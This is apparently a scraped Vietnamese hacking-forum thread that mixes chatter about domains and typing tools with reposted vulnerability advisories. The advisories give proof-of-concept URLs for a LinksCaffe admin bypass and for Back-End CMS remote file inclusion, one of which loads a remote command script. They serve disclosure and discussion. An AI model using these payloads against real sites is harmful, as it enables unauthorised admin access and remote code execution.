|
|
Những cơ bản này có ích cho những ai bước đầu tìm hiểu lập trình hay kiểm soát hệ thống, cái này chắc có trong giáo trình của các trường CNTT nhỉ? Còn sợ nó nguy hiểm thì cũng không hẳn vì tool tự viết virus khá nhiều , và cũng nguy hiểm không kém (trên máy đơn). IT rất là rộng, không ai hiểu được hết mọi thứ, không phải ai cũng hiểu về lập trình, cũng như 90% mọi người ở đây không biết hết cách trang trí văn bản excel chuyên nghiệp vậy
|
|
|
www.html.con.vn cũng hay đấy chứ? BQT xin 1 cái được đó
|
|
|
Gonafish.com LinksCaffe 3.0 is free link indexing directory, we found that the file admin1953.php can be accessed directly to get full administration rights without password and username.
Proof of exploit:
http://www.example.com/[path_to_linksCaffe]/Admin/admin1953.php
Or the images of mirror
http://vietnamsecurity.googlepages.com/1.JPG
http://vietnamsecurity.googlepages.com/2.JPG
http://vietnamsecurity.googlepages.com/3.JPG
Affected
LinksCaffe 2.0, 3.0, Pro no test
Fix : Easy to fix, just put checker to the file
http://www.securityfocus.com/archive/1/444636/30/0/threaded
|
|
|
NETSOL có bug, sớm hay muộn hvaonline.net cũng mất thôi, vì tính không chắc chắn của domain.com mà HVA không liên quan tới, Theo HY các anh nên dùng hvaonline.vn để làm domain chính thức, hoặc hvaonline.net.vn để làm dự phòng, hvaonline.net nếu có thì nên chạy về là đủ, các anh muốn không bị sóng gió quá nhiều xin làm như vậy là yên tâm cho các mem nhất
|
|
|
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng
|
|
|
, các bạn là hacker chẳng lẽ chưa vô 1 cái host nào mà không soi được config sao?
|
|
|
Ngoài ra còn 1 lỗi nữa nè
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
|
|
|
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
ExploitAlert Id : 633
Credit : Kacper
Date : 27.5.2006
Download
Exploit Code :
################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/
BE_config.php Line 27-31:
Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]
#Elo
ExploitAlert Id : 633
Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy?
|
|
|
chúc mừng HVA come back, Y gõ TV bằng bộ gõ của forum sao chưa được vậy? F1 đến f12 liền mấy lần không được, đành dùng Vietkey
|
|